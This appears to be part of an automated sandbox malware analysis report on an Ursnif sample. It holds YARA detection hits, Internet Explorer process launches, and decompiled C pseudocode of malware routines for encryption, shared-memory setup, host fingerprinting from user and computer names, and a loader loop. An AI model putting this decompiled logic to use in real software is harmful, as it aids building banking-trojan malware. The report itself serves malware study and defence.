                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343809632.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343983183.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343884833.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000002.811764188.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343969010.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343764685.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.343941350.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.502184053.0000000004F48000.00000004.00000040.sdmp, Author: Joe Security
                  Reputation:high

                  Start time:07:52:29
                  Start date:21/01/2022
                  Path:C:\Program Files\internet explorer\iexplore.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                  Imagebase:0x7ff6ad3f0000
                  File size:823560 bytes
                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Start time:07:52:30
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17410 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Start time:07:52:31
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17414 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Start time:07:52:31
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:82946 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Start time:07:52:32
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6600 CREDAT:17418 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Start time:07:53:16
                  Start date:21/01/2022
                  Path:C:\Program Files\internet explorer\iexplore.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                  Imagebase:0x7ff6ad3f0000
                  File size:823560 bytes
                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Start time:07:53:17
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17410 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Start time:07:53:19
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:17416 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high

                  Start time:07:53:19
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:82946 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Start time:07:53:19
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:6076 CREDAT:148484 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Start time:07:53:50
                  Start date:21/01/2022
                  Path:C:\Program Files\internet explorer\iexplore.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                  Imagebase:0x7ff6ad3f0000
                  File size:823560 bytes
                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Start time:07:53:50
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17410 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Start time:07:53:51
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:17414 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Start time:07:53:51
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:82946 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Start time:07:53:51
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3648 CREDAT:214018 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Start time:07:54:14
                  Start date:21/01/2022
                  Path:C:\Program Files\internet explorer\iexplore.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
                  Imagebase:0x7ff6ad3f0000
                  File size:823560 bytes
                  MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Start time:07:54:15
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17410 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Start time:07:54:18
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:17416 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Start time:07:54:20
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:148482 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language

                  Start time:07:54:20
                  Start date:21/01/2022
                  Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:344 CREDAT:214018 /prefetch:2
                  Imagebase:0xb00000
                  File size:822536 bytes
                  MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language


                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 135 10c4872-10c48b2 CryptAcquireContextW 136 10c48b8-10c48f4 memcpy CryptImportKey 135->136 137 10c4a09-10c4a0f GetLastError 135->137 139 10c48fa-10c490c CryptSetKeyParam 136->139 140 10c49f4-10c49fa GetLastError 136->140 138 10c4a12-10c4a19 137->138 142 10c49e0-10c49e6 GetLastError 139->142 143 10c4912-10c491b 139->143 141 10c49fd-10c4a07 CryptReleaseContext 140->141 141->138 144 10c49e9-10c49f2 CryptDestroyKey 142->144 145 10c491d-10c491f 143->145 146 10c4923-10c4930 call 10c63fd 143->146 144->141 145->146 147 10c4921 145->147 150 10c4936-10c493f 146->150 151 10c49d7-10c49de 146->151 147->146 152 10c4942-10c494a 150->152 151->144 153 10c494c 152->153 154 10c494f-10c496c memcpy 152->154 153->154 155 10c496e-10c4985 CryptEncrypt 154->155 156 10c4987-10c4996 CryptDecrypt 154->156 157 10c499c-10c499e 155->157 156->157 158 10c49ae-10c49b9 GetLastError 157->158 159 10c49a0-10c49aa 157->159 161 10c49cd-10c49d5 call 10c17ab 158->161 162 10c49bb-10c49cb 158->162 159->152 160 10c49ac 159->160 160->162 161->144 162->144
                    C-Code - Quality: 58%
                    			E010C4872(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                    				int _v8;
                    				long* _v12;
                    				int _v16;
                    				BYTE* _v20;
                    				long* _v24;
                    				void* _v39;
                    				char _v40;
                    				void _v56;
                    				int _v60;
                    				intOrPtr _v64;
                    				void _v67;
                    				char _v68;
                    				void* _t61;
                    				int _t68;
                    				signed int _t76;
                    				int _t79;
                    				int _t81;
                    				int _t85;
                    				long _t86;
                    				int _t90;
                    				signed int _t94;
                    				int _t101;
                    				BYTE* _t102;
                    				int _t103;
                    				void* _t104;
                    				void* _t105;
                    				void* _t106;
                    
                    				_t103 = __eax;
                    				_t94 = 6;
                    				_v68 = 0;
                    				memset( &_v67, 0, _t94 << 2);
                    				_t105 = _t104 + 0xc;
                    				asm("stosw");
                    				asm("stosb");
                    				_v40 = 0;
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosd");
                    				asm("stosw");
                    				asm("stosb");
                    				_t61 =  *0x10ca0e4( &_v24, 0, 0, 0x18, 0xf0000000); // executed
                    				if(_t61 == 0) {
                    					_a8 = GetLastError();
                    				} else {
                    					_t101 = 0x10;
                    					memcpy( &_v56, _a8, _t101);
                    					_t106 = _t105 + 0xc;
                    					_v60 = _t101;
                    					_v67 = 2;
                    					_v64 = 0x660e;
                    					_v68 = 8;
                    					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
                    					if(_t68 == 0) {
                    						_a8 = GetLastError();
                    					} else {
                    						_push(0);
                    						_push( &_v40);
                    						_push(1);
                    						_push(_v12);
                    						if( *0x10ca0c4() == 0) {
                    							_a8 = GetLastError();
                    						} else {
                    							_t18 = _t103 + 0xf; // 0x11f
                    							_t76 = _t18 & 0xfffffff0;
                    							if(_a4 != 0 && _t76 == _t103) {
                    								_t76 = _t76 + _t101;
                    							}
                    							_t102 = E010C63FD(_t76);
                    							_v20 = _t102;
                    							if(_t102 == 0) {
                    								_a8 = 8;
                    							} else {
                    								_v16 = 0;
                    								_a8 = 0;
                    								while(1) {
                    									_t79 = 0x10;
                    									_v8 = _t79;
                    									if(_t103 <= _t79) {
                    										_v8 = _t103;
                    									}
                    									memcpy(_t102, _a12, _v8);
                    									_t81 = _v8;
                    									_a12 = _a12 + _t81;
                    									_t103 = _t103 - _t81;
                    									_t106 = _t106 + 0xc;
                    									if(_a4 == 0) {
                    										_t85 = CryptDecrypt(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
                    									} else {
                    										_t85 =  *0x10ca0c8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
                    									}
                    									if(_t85 == 0) {
                    										break;
                    									}
                    									_t90 = _v8;
                    									_v16 = _v16 + _t90;
                    									_t102 =  &(_t102[_t90]);
                    									if(_t103 != 0) {
                    										continue;
                    									} else {
                    										L17:
                    										 *_a16 = _v20;
                    										 *_a20 = _v16;
                    									}
                    									goto L21;
                    								}
                    								_t86 = GetLastError();
                    								_a8 = _t86;
                    								if(_t86 != 0) {
                    									E010C17AB(_v20);
                    								} else {
                    									goto L17;
                    								}
                    							}
                    						}
                    						L21:
                    						CryptDestroyKey(_v12);
                    					}
                    					CryptReleaseContext(_v24, 0);
                    				}
                    				return _a8;
                    			}































                    APIs
                    • CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000018,F0000000,?,00000110,010C3AC6), ref: 010C48AA
                    • memcpy.NTDLL(?,010C3AC6,00000010,?,?,?,?,?,?,?,?,?,?,010C60F5,00000000,010C4DD9), ref: 010C48C3
                    • CryptImportKey.ADVAPI32(00000000,?,0000001C,00000000,00000000,?), ref: 010C48EC
                    • CryptSetKeyParam.ADVAPI32(?,00000001,?,00000000), ref: 010C4904
                    • memcpy.NTDLL(00000000,010C4DD9,010C3AC6,0000011F), ref: 010C4956
                    • CryptEncrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,010C3AC6,00000020,?,?,0000011F), ref: 010C497F
                    • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,00000000,010C3AC6,?,?,0000011F), ref: 010C4996
                    • GetLastError.KERNEL32(?,?,0000011F), ref: 010C49AE
                    • GetLastError.KERNEL32 ref: 010C49E0
                    • CryptDestroyKey.ADVAPI32(?), ref: 010C49EC
                    • GetLastError.KERNEL32 ref: 010C49F4
                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 010C4A01
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,010C60F5,00000000,010C4DD9,010C3AC6,?,010C3AC6), ref: 010C4A09
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDecryptDestroyEncryptImportParamRelease
                    • String ID:
                    • API String ID: 1967744295-0
                    • Opcode ID: 5c5085b3e7ae0db0bdf4a95fe23cf157e2485f56fb3d965d8211769d4db886b1
                    • Instruction ID: dbed2b3732ce85c7f3b304632de5491c9fd3f5f9660d10293aeeae1492e331a0
                    • Opcode Fuzzy Hash: 5c5085b3e7ae0db0bdf4a95fe23cf157e2485f56fb3d965d8211769d4db886b1
                    • Instruction Fuzzy Hash: 60515971900218FFEB20DFA8D888AEEBBB8FB04754F104469F985E7240E7758A54DF21
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 231 10001dcf-10001e26 _aulldiv _snwprintf 233 10001e28 231->233 234 10001e2d-10001e46 231->234 233->234 236 10001e90-10001e96 GetLastError 234->236 237 10001e48-10001e51 234->237 240 10001e98-10001e9e 236->240 238 10001e61-10001e6f MapViewOfFile 237->238 239 10001e53-10001e5a GetLastError 237->239 242 10001e71-10001e7d 238->242 243 10001e7f-10001e85 GetLastError 238->243 239->238 241 10001e5c-10001e5f 239->241 244 10001e87-10001e8e CloseHandle 241->244 242->240 243->240 243->244 244->240
                    C-Code - Quality: 69%
                    			E10001DCF(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                    				intOrPtr _v12;
                    				struct _FILETIME* _v16;
                    				short _v60;
                    				struct _FILETIME* _t14;
                    				intOrPtr _t15;
                    				long _t18;
                    				void* _t19;
                    				void* _t22;
                    				intOrPtr _t31;
                    				long _t32;
                    				void* _t34;
                    
                    				_t31 = __edx;
                    				_t14 =  &_v16;
                    				GetSystemTimeAsFileTime(_t14);
                    				_push(0x192);
                    				_push(0x54d38000);
                    				_push(_v12);
                    				_push(_v16);
                    				L100021F0();
                    				_push(_t14);
                    				_v16 = _t14;
                    				_t15 =  *0x100041d0;
                    				_push(_t15 + 0x1000505e);
                    				_push(_t15 + 0x10005054);
                    				_push(0x16);
                    				_push( &_v60);
                    				_v12 = _t31;
                    				L100021EA();
                    				_t18 = _a4;
                    				if(_t18 == 0) {
                    					_t18 = 0x1000;
                    				}
                    				_t19 = CreateFileMappingW(0xffffffff, 0x100041c0, 4, 0, _t18,  &_v60); // executed
                    				_t34 = _t19;
                    				if(_t34 == 0) {
                    					_t32 = GetLastError();
                    				} else {
                    					if(_a4 != 0 || GetLastError() == 0xb7) {
                    						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
                    						if(_t22 == 0) {
                    							_t32 = GetLastError();
                    							if(_t32 != 0) {
                    								goto L9;
                    							}
                    						} else {
                    							 *_a8 = _t34;
                    							 *_a12 = _t22;
                    							_t32 = 0;
                    						}
                    					} else {
                    						_t32 = 2;
                    						L9:
                    						CloseHandle(_t34);
                    					}
                    				}
                    				return _t32;
                    			}















                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,10001F21,0000000A,?,?), ref: 10001DDC
                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001DF2
                    • _snwprintf.NTDLL ref: 10001E17
                    • CreateFileMappingW.KERNELBASE(000000FF,100041C0,00000004,00000000,?,?), ref: 10001E3C
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001F21,0000000A,?), ref: 10001E53
                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 10001E67
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001F21,0000000A,?), ref: 10001E7F
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,10001F21,0000000A), ref: 10001E88
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,10001F21,0000000A,?), ref: 10001E90
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                    • String ID: At`Rt
                    • API String ID: 1724014008-4257177166
                    • Opcode ID: fe8e0312be3bd5815d8acad5171ae4a4159edb195e2773d4f5fb25bbf3a3f938
                    • Instruction ID: 146729f2bc210c63e1e77147fa2b15d87e0528f2de9ba26f60d27e9d9c38c8a0
                    • Opcode Fuzzy Hash: fe8e0312be3bd5815d8acad5171ae4a4159edb195e2773d4f5fb25bbf3a3f938
                    • Instruction Fuzzy Hash: 53217CB2900158AFFB11EFA8CCC4EEF77ADEB583D0F118025FA15D71A8DA3099418B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E010C21BC(char __eax, signed int* __esi) {
                    				long _v8;
                    				char _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v28;
                    				long _t34;
                    				signed int _t39;
                    				long _t50;
                    				char _t59;
                    				intOrPtr _t61;
                    				void* _t62;
                    				void* _t63;
                    				signed int* _t64;
                    				char _t65;
                    				intOrPtr* _t67;
                    				void* _t68;
                    				signed int* _t69;
                    
                    				_t69 = __esi;
                    				_t65 = __eax;
                    				_v8 = 0;
                    				_v12 = __eax;
                    				if(__eax == 0) {
                    					_t59 =  *0x10ca310; // 0xd448b889
                    					_v12 = _t59;
                    				}
                    				_t64 = _t69;
                    				E010C5894( &_v12, _t64);
                    				if(_t65 != 0) {
                    					 *_t69 =  *_t69 ^  *0x10ca31c ^ 0x46d76429;
                    				} else {
                    					GetUserNameW(0,  &_v8); // executed
                    					_t50 = _v8;
                    					if(_t50 != 0) {
                    						_t62 = RtlAllocateHeap( *0x10ca2d8, 0, _t50 + _t50);
                    						if(_t62 != 0) {
                    							if(GetUserNameW(_t62,  &_v8) != 0) {
                    								_t63 = _t62;
                    								 *_t69 =  *_t69 ^ E010C52A9(_v8 + _v8, _t63);
                    							}
                    							HeapFree( *0x10ca2d8, 0, _t62);
                    						}
                    					}
                    				}
                    				_t61 = __imp__;
                    				_v8 = _v8 & 0x00000000;
                    				GetComputerNameW(0,  &_v8);
                    				_t34 = _v8;
                    				if(_t34 != 0) {
                    					_t68 = RtlAllocateHeap( *0x10ca2d8, 0, _t34 + _t34);
                    					if(_t68 != 0) {
                    						if(GetComputerNameW(_t68,  &_v8) != 0) {
                    							_t63 = _t68;
                    							_t69[3] = _t69[3] ^ E010C52A9(_v8 + _v8, _t63);
                    						}
                    						HeapFree( *0x10ca2d8, 0, _t68);
                    					}
                    				}
                    				asm("cpuid");
                    				_t67 =  &_v28;
                    				 *_t67 = 1;
                    				 *((intOrPtr*)(_t67 + 4)) = _t61;
                    				 *(_t67 + 8) = _t63;
                    				 *(_t67 + 0xc) = _t64;
                    				_t39 = _v16 ^ _v20 ^ _v28;
                    				_t69[1] = _t69[1] ^ _t39;
                    				return _t39;
                    			}

                    APIs
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 010C21F3
                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 010C220A
                    • GetUserNameW.ADVAPI32(00000000,?), ref: 010C2217
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C2238
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 010C225F
                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 010C2273
                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 010C2280
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C229E
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: HeapName$AllocateComputerFreeUser
                    • String ID: Ut
                    • API String ID: 3239747167-8415677
                    • Opcode ID: f3cd61cb9e644d3e1a6a4bb2bbe23fc03465ec821e2d5c8fa4bee855c4eac702
                    • Instruction ID: e0948c21e248b6890b15fd5b40adbaf5b5bda7edb1dbcbba3e61b5298751a393
                    • Opcode Fuzzy Hash: f3cd61cb9e644d3e1a6a4bb2bbe23fc03465ec821e2d5c8fa4bee855c4eac702
                    • Instruction Fuzzy Hash: FD313C71A00209EFDB21DFA9DC80A6EBBFAFB48710F204069E585D3214E735E9409F10
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E10001077(char _a4) {
                    				long _v8;
                    				long _v12;
                    				char _v36;
                    				void* __edi;
                    				long _t25;
                    				long _t27;
                    				long _t28;
                    				long _t32;
                    				void* _t38;
                    				intOrPtr _t40;
                    				signed int _t44;
                    				signed int _t45;
                    				long _t50;
                    				intOrPtr _t52;
                    				signed int _t53;
                    				void* _t57;
                    				void* _t60;
                    				signed int _t62;
                    				signed int _t63;
                    				void* _t67;
                    				intOrPtr* _t68;
                    
                    				_t25 = E1000169C();
                    				_v8 = _t25;
                    				if(_t25 != 0) {
                    					return _t25;
                    				}
                    				do {
                    					_t62 = 0;
                    					_v12 = 0;
                    					_t50 = 0x30;
                    					do {
                    						_t57 = E100011B5(_t50);
                    						if(_t57 == 0) {
                    							_v8 = 8;
                    						} else {
                    							_t44 = NtQuerySystemInformation(8, _t57, _t50,  &_v12); // executed
                    							_t53 = _t44;
                    							_t45 = _t44 & 0x0000ffff;
                    							_v8 = _t45;
                    							if(_t45 == 4) {
                    								_t50 = _t50 + 0x30;
                    							}
                    							_t63 = 0x13;
                    							_t10 = _t53 + 1; // 0x1
                    							_t62 =  *_t57 % _t63 + _t10;
                    							E1000164B(_t57);
                    						}
                    					} while (_v8 != 0);
                    					_t27 = E10001508(_t57, _t62); // executed
                    					_v8 = _t27;
                    					Sleep(_t62 << 4); // executed
                    					_t28 = _v8;
                    				} while (_t28 == 9);
                    				if(_t28 != 0) {
                    					L25:
                    					return _t28;
                    				}
                    				if(_a4 != 0) {
                    					L18:
                    					_push(0);
                    					_t67 = E1000193D(E10001EA8,  &_v36);
                    					if(_t67 == 0) {
                    						_v8 = GetLastError();
                    					} else {
                    						_t32 = WaitForSingleObject(_t67, 0xffffffff);
                    						_v8 = _t32;
                    						if(_t32 == 0) {
                    							GetExitCodeThread(_t67,  &_v8);
                    						}
                    						CloseHandle(_t67);
                    					}
                    					_t28 = _v8;
                    					if(_t28 == 0xffffffff) {
                    						_t28 = GetLastError();
                    					}
                    					goto L25;
                    				}
                    				if(E10001351(_t53,  &_a4) != 0) {
                    					 *0x100041b8 = 0;
                    					goto L18;
                    				}
                    				_t52 = _a4;
                    				_t68 = __imp__GetLongPathNameW;
                    				_t38 =  *_t68(_t52, 0, 0); // executed
                    				_t60 = _t38;
                    				if(_t60 == 0) {
                    					L16:
                    					 *0x100041b8 = _t52;
                    					goto L18;
                    				}
                    				_t19 = _t60 + 2; // 0x2
                    				_t40 = E100011B5(_t60 + _t19);
                    				 *0x100041b8 = _t40;
                    				if(_t40 == 0) {
                    					goto L16;
                    				}
                    				 *_t68(_t52, _t40, _t60); // executed
                    				E1000164B(_t52);
                    				goto L18;
                    			}

                    APIs
                      • Part of subcall function 1000169C: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,10001082), ref: 100016AB
                      • Part of subcall function 1000169C: GetVersion.KERNEL32 ref: 100016BA
                      • Part of subcall function 1000169C: GetCurrentProcessId.KERNEL32 ref: 100016D1
                      • Part of subcall function 1000169C: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 100016EA
                      • Part of subcall function 100011B5: HeapAlloc.KERNEL32(00000000,?,1000109E,00000030,74E063F0,00000000), ref: 100011C1
                    • NtQuerySystemInformation.NTDLL ref: 100010AC
                    • Sleep.KERNELBASE(00000000,00000000,00000030,74E063F0,00000000), ref: 100010F3
                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 10001129
                    • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 10001147
